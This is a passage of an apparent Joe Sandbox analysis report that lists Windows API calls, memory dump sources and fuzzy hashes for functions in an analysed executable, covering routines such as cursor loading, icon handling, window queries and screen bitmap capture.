                                                                                                                                                                            • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 0046FC73
                                                                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FC97
                                                                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FCA5
                                                                                                                                                                            • SendMessageW.USER32 ref: 0046FD00
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$IconImageList_$CreateExtractReplace
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2632138820-0
                                                                                                                                                                            • Opcode ID: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                                                                                                                            • Instruction ID: f8b2170a3f6480226351c2682443129a31dd3945ebd2779c8b18a40e734619f9
                                                                                                                                                                            • Opcode Fuzzy Hash: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                                                                                                                            • Instruction Fuzzy Hash: A461BF70208305AFD320DF14DC85F5BB7E4FB89B14F10492EFA85972D1E7B4A8498B66
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00433BC7
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 00433BDE
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 00433BF5
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 00433C0C
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 00433C23
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00433C3A
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 00433C51
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00433C68
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00433C7F
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 00433C96
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00433CAD
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 00433CC4
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00433CDB
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00000000), ref: 00433CEF
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00433D06
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CursorLoad
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3238433803-0
                                                                                                                                                                            • Opcode ID: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                                                                                                                            • Instruction ID: acd63d7325575073817552101614e6badc0a76bef24473f745c9da0ba21645f6
                                                                                                                                                                            • Opcode Fuzzy Hash: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                                                                                                                            • Instruction Fuzzy Hash: 6D310E3058C302FFE7504F50EE0AB1C36A0BB48B47F008C7DF64AA62E0E6F055009B9A
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00460AF5
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00460B00
                                                                                                                                                                            • __swprintf.LIBCMT ref: 00460B9E
                                                                                                                                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00460C11
                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00460C8E
                                                                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 00460CE6
                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00460D21
                                                                                                                                                                            • GetParent.USER32(?), ref: 00460D40
                                                                                                                                                                            • ScreenToClient.USER32(00000000), ref: 00460D47
                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00460DBE
                                                                                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00460DFB
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                                                                                                                            • String ID: %s%u
                                                                                                                                                                            • API String ID: 1899580136-679674701
                                                                                                                                                                            • Opcode ID: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                                                                                                                            • Instruction ID: ed0b46c26cbb3f928a943cd91895a09858176ee0e89b0f6962e21683ef9d2041
                                                                                                                                                                            • Opcode Fuzzy Hash: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                                                                                                                            • Instruction Fuzzy Hash: 3AA1CD722043019BDB14DF54C884BEB73A8FF84714F04892EFD889B245E778E946CBA6
                                                                                                                                                                            APIs
                                                                                                                                                                            • CoTaskMemFree.OLE32(?), ref: 0047D6D3
                                                                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                            • StringFromCLSID.OLE32(?,?), ref: 0047D6B5
                                                                                                                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                                                            • StringFromIID.OLE32(?,?), ref: 0047D7F0
                                                                                                                                                                            • CoTaskMemFree.OLE32(?), ref: 0047D80A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FreeFromStringTask_wcslen$_wcscpy
                                                                                                                                                                            • String ID: 0vH$CLSID\$Interface\$ProgID$ToolBoxBitmap32$inprocserver32$localserver32$HH
                                                                                                                                                                            • API String ID: 2485709727-934586222
                                                                                                                                                                            • Opcode ID: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                                                                                                                            • Instruction ID: 9b1d76abf7044590dd80f2c514dab21f357569e7696d0ed80310904c07b122bf
                                                                                                                                                                            • Opcode Fuzzy Hash: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                                                                                                                            • Instruction Fuzzy Hash: 63714BB5614201AFC304EF25C981D5BB3F8BF88704F108A2EF5599B351DB78E905CB6A
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcscpy$Folder_memset$BrowseDesktopFromInitializeListMallocPathUninitialize
                                                                                                                                                                            • String ID: HH
                                                                                                                                                                            • API String ID: 3381189665-2761332787
                                                                                                                                                                            • Opcode ID: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                                                                                                                            • Instruction ID: 9856a5a3be2a6f4b6f15ab218c20ab076772672eb14c4daba281b2e598c2a196
                                                                                                                                                                            • Opcode Fuzzy Hash: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                                                                                                                            • Instruction Fuzzy Hash: E1619AB59043009FC320EF65C88499BB7E9BFC8704F048E1EF98987252D775E849CB6A
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00434585
                                                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00434590
                                                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0043459B
                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 004345A9
                                                                                                                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00434618
                                                                                                                                                                            • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00434665
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                                                                                                            • String ID: (
                                                                                                                                                                            • API String ID: 3300687185-3887548279
                                                                                                                                                                            • Opcode ID: f1a61bd92dc1e5bf4a907c179000b9c6a14a2e3466c3eeb116f883cf8bb2fa69
                                                                                                                                                                            • Instruction ID: a007e7ec8c3f390601fcb6226b5fc218b62818acb39bbc9fe8cd9ddeb27b86ed
                                                                                                                                                                            • Opcode Fuzzy Hash: f1a61bd92dc1e5bf4a907c179000b9c6a14a2e3466c3eeb116f883cf8bb2fa69
                                                                                                                                                                            • Instruction Fuzzy Hash: E4514871508345AFD310CF69C884B6BBBE9EF8A310F14881DFA9687390D7B5E844CB66
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E463
                                                                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                            • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E480
                                                                                                                                                                            • __swprintf.LIBCMT ref: 0045E4D9
                                                                                                                                                                            • _printf.LIBCMT ref: 0045E595
                                                                                                                                                                            • _printf.LIBCMT ref: 0045E5B7
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LoadString_printf$__swprintf_wcslen
                                                                                                                                                                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR $HH
                                                                                                                                                                            • API String ID: 3590180749-2894483878
                                                                                                                                                                            • Opcode ID: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                                                                                                                            • Instruction ID: 42a5c2f6345f2e10047da6565a111f96cfad8617a22bea28fc44504b1d19b7ce
                                                                                                                                                                            • Opcode Fuzzy Hash: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                                                                                                                            • Instruction Fuzzy Hash: 9F51A171518345ABD324EF91CC41DAF77A8AF84754F04093FF94463292EB78EE488B6A
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0046F911
                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 0046F929
                                                                                                                                                                            • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 0046F942
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0046F950
                                                                                                                                                                            • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,00000000,00000000,00000000,00002010,?,000000F0), ref: 0046F95E
                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9A8
                                                                                                                                                                            • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 0046F9C1
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0046F9CF
                                                                                                                                                                            • DestroyIcon.USER32(?,?,000000F7,00000001,00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9DD
                                                                                                                                                                            • ExtractIconExW.SHELL32(?,?,?,000000FF,00000001), ref: 0046FA1D
                                                                                                                                                                            • DestroyIcon.USER32(?), ref: 0046FA4F
                                                                                                                                                                            • SendMessageW.USER32(?,000000F7,00000001,?), ref: 0046FA5A
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0046FA68
                                                                                                                                                                            • DestroyIcon.USER32(?,?,000000F7,00000001,?), ref: 0046FA76
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Icon$Destroy$DeleteMessageObjectSend$ImageLoad$ExtractLongWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3412594756-0
                                                                                                                                                                            • Opcode ID: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                                                                                                                            • Instruction ID: 2b127e2e725f503062080ad48664a75956f0b49bd2ac624c91da1236fc619d99
                                                                                                                                                                            • Opcode Fuzzy Hash: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                                                                                                                            • Instruction Fuzzy Hash: BD41B575344301ABE7209B65ED45B6B7398EB44711F00083EFA85A7381DBB9E809C76A
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                                                                                                              • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                                                                                                            • GetDriveTypeW.KERNEL32 ref: 0045DA30
                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DA76
                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DAAB
                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DADF
                                                                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: SendString$_wcslen$BuffCharDriveLowerType
                                                                                                                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                            • API String ID: 4013263488-4113822522
                                                                                                                                                                            • Opcode ID: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                                                                                                                            • Instruction ID: 78e8968fe3d68f28a61334a0544e46eb3ade7c09d07056eb4a028b8014bab4f9
                                                                                                                                                                            • Opcode Fuzzy Hash: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                                                                                                                            • Instruction Fuzzy Hash: 86516E71604300ABD710EF55CC85F5EB3E4AF88714F14496EF985AB2D2D7B8E908CB5A
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcslen$_wcsncpy$LocalTime__wcstoi64
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 228034949-0
                                                                                                                                                                            • Opcode ID: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                                                                                                                            • Instruction ID: c9113392db11e6d0b84b7dcaf0f9983ae7bcdcfbf3325debe08446cd55f13bc3
                                                                                                                                                                            • Opcode Fuzzy Hash: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                                                                                                                            • Instruction Fuzzy Hash: 874194B181435066DA10FF6AC8479DFB3A8EF89314F84495FF945D3162E378E64883AA
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,0046FAD5), ref: 004334F4
                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043350F
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043351A
                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00433523
                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433533
                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0043353A
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433541
                                                                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043354F
                                                                                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,?), ref: 00433568
                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0043357B
                                                                                                                                                                            • GetObjectW.GDI32(?,00000018,?), ref: 004335A6
                                                                                                                                                                            • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004335DB
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00433603
                                                                                                                                                                            • SendMessageW.USER32(?,00000172,00000000,?), ref: 0043361B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3969911579-0
                                                                                                                                                                            • Opcode ID: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                                                                                                                            • Instruction ID: 5aed18668fdc988692497ed4484016cc97142e8c7c748bcd34b77a3330007e11
                                                                                                                                                                            • Opcode Fuzzy Hash: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                                                                                                                            • Instruction Fuzzy Hash: 70410471204210AFD710DF64DC88F6BBBE8FB89711F10492DFA45972A0D7B5A941CBAA
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetParent.USER32 ref: 00445A8D
                                                                                                                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00445AA0
                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 00445AC4
                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 00445AE0
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445B3D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                                                                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                            • API String ID: 3125838495-3381328864
                                                                                                                                                                            • Opcode ID: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                                                                                                                            • Instruction ID: 9ea7b4bfd8e333fc3d4c3d1cc69785ca983c3453aa66f955cff8de8c622a02b1
                                                                                                                                                                            • Opcode Fuzzy Hash: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                                                                                                                            • Instruction Fuzzy Hash: F011E9B1B40301BBFF10B6659C46EAF739CDF94759F00081BFD44E6182F6ACA9458769
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
